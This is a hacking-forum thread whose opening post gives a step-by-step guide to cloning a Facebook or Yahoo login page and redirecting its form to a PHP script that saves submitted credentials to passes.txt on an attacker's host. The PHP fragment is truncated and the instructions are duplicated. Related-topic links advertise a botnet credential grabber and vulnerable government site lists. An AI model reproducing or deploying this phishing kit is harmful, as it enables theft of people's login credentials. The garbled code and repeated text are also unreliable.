Make Phishing Page from any site
2 posters
Page 1 of 1
Make Phishing Page from any site
-- go to the real site u want to make a fake version of and save the complete page as index.htm
-- open index.htm with word or notepad or ur prefered text editor and search (ctrl+f) for the word action
-- the part u want will be somthing like this- facebook for example
action="https://www.facebook.com/login.php?login_attempt=1" method="post"
Or yahoo
form method="post" action="https://login.yahoo.com/config/login?"
--edit this line only as follows
form method="GET" action="login.php"
--change form method to GET and action to login.php and save the htm
-next u will need to create the login.php file ,heres how
-create a new txt file with notepad and paste the following code
Code:
$value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Change "example" to the url of the site u want to use yahoo or facebook etc
-save the file as login.php
-now u have all u need for ur fake page!!
-upload the 2 files,login.php and index.htm to a host and try it out! a new file will automaticaly be create called passes.txt which will contain the info .
-- open index.htm with word or notepad or ur prefered text editor and search (ctrl+f) for the word action
-- the part u want will be somthing like this- facebook for example
action="https://www.facebook.com/login.php?login_attempt=1" method="post"
Or yahoo
form method="post" action="https://login.yahoo.com/config/login?"
--edit this line only as follows
form method="GET" action="login.php"
--change form method to GET and action to login.php and save the htm
-next u will need to create the login.php file ,heres how
-create a new txt file with notepad and paste the following code
Code:
$value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Change "example" to the url of the site u want to use yahoo or facebook etc
-save the file as login.php
-now u have all u need for ur fake page!!
-upload the 2 files,login.php and index.htm to a host and try it out! a new file will automaticaly be create called passes.txt which will contain the info .
Re: Make Phishing Page from any site
sorry what do you mean by the "example" in *Change "example" to the url of the site u want to use yahoo or facebook etc*?
shawn.ong- Posts : 1
Join date : 2014-09-29
Re: Make Phishing Page from any site
i gave facebook as example of scam page , for sure it can be any other website and change from 'post action' to 'get action' as in example bellow
Similar topics
» How to make ExE to PDF using Metasploit
» NEW -> NEW -> NEW -> ZEUS BOTNET GRABB 5 BROWSERS
» List Of Gov VUL Fresh Site !
» NEW -> NEW -> NEW -> ZEUS BOTNET GRABB 5 BROWSERS
» List Of Gov VUL Fresh Site !
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum